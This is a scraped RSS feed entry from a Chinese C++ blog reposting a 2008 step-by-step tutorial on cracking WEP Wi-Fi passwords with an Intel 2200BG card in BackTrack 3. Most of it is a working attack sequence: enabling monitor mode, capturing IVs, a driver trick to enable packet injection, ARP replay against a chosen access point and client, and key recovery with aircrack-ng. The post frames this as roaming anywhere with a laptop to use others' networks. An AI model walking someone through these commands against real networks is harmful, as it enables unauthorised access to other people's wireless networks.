C++博客-Think<Br>-随笔分类-网络安全http://www.cppblog.com/think/category/8896.html&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;宁静致远,淡泊明志zh-cnMon, 29 Dec 2008 04:43:28 GMTMon, 29 Dec 2008 04:43:28 GMT60【转帖】Intel 2200bg注入式破解wep简明教程http://www.cppblog.com/think/archive/2008/11/21/67489.htmlthinkthinkFri, 21 Nov 2008 06:25:00 GMThttp://www.cppblog.com/think/archive/2008/11/21/67489.htmlhttp://www.cppblog.com/think/comments/67489.htmlhttp://www.cppblog.com/think/archive/2008/11/21/67489.html#Feedback0http://www.cppblog.com/think/comments/commentRss/67489.htmlhttp://www.cppblog.com/think/services/trackbacks/67489.html转自中国无线门户,原文地址:http://www.anywlan.com/bbs/dispbbs.asp?BoardID=15&replyID=69593&id=9459&skin=0



目前,80%的笔记本电脑内置了Intel 2200BG无线网卡,此卡性能稳定,功率大,信号好,性能稳定。但由于其在bt3下,不能直接支持注入式破解,多数人用此卡破解不成功,不得不购买所谓支持注入破解的。
笔者研2200BG破究了各种用Intel 解wep的方法,近期终于活动突破性进展。终于实现”抱着笔记本即可走天下“的愿望,不敢独享,遂发帖,与各位兄弟共同学习之。
1.装备: dell D410笔记本、内置Intel2200BG无线网卡,bt3中文u盘。
2.启动BT3,打开一个窗口,输入ifconfig –a 查看网卡
3.输入airmon-ng start eth1

激活网卡的Monitor模式


4.输入抓包命令,抓包并查看你要破解的ap的mac和与之相连的客户端mac。
输入命令

airodump-ng --ivs -w name –c 6 eth1

,其中,eth1是你破解用的网卡接口名(下同),这样,你的窗口将显示一个工作站,可以看到你要破解的ap的essid 和mac 和与之相连接的客户端的mac。


5.上面窗口不关闭,另开一个窗口,输入命令
modprobe ipw2200 rtap_iface=1回车
再注入
iwconfig eth1 ap <AP MAC>



其中,ap后面跟你要破解的ap的mac,值得注意的是,这个mac必须输入中间的“:”。(如图)
回车后,输入
iwconfig eth1 key s:fakekey
回车,如果输入准确无误,你已经成功的为2200打上了注入补丁,后面就可以用常规方式进行注入、破解了。
6.输入aireplay-ng -3 -b ap的mac -h 客户端网卡的mac eth1

进行注入。
快的一分钟,慢的5分钟,即可成功注入。

到数据增加到1万以上时,另开窗口,启动
aircrack-ng -n 64 name-01.ivs
其中
64 是64位密码,如果是128位,换成128即可实现破解。

think 2008-11-21 14:25 发表评论
]]>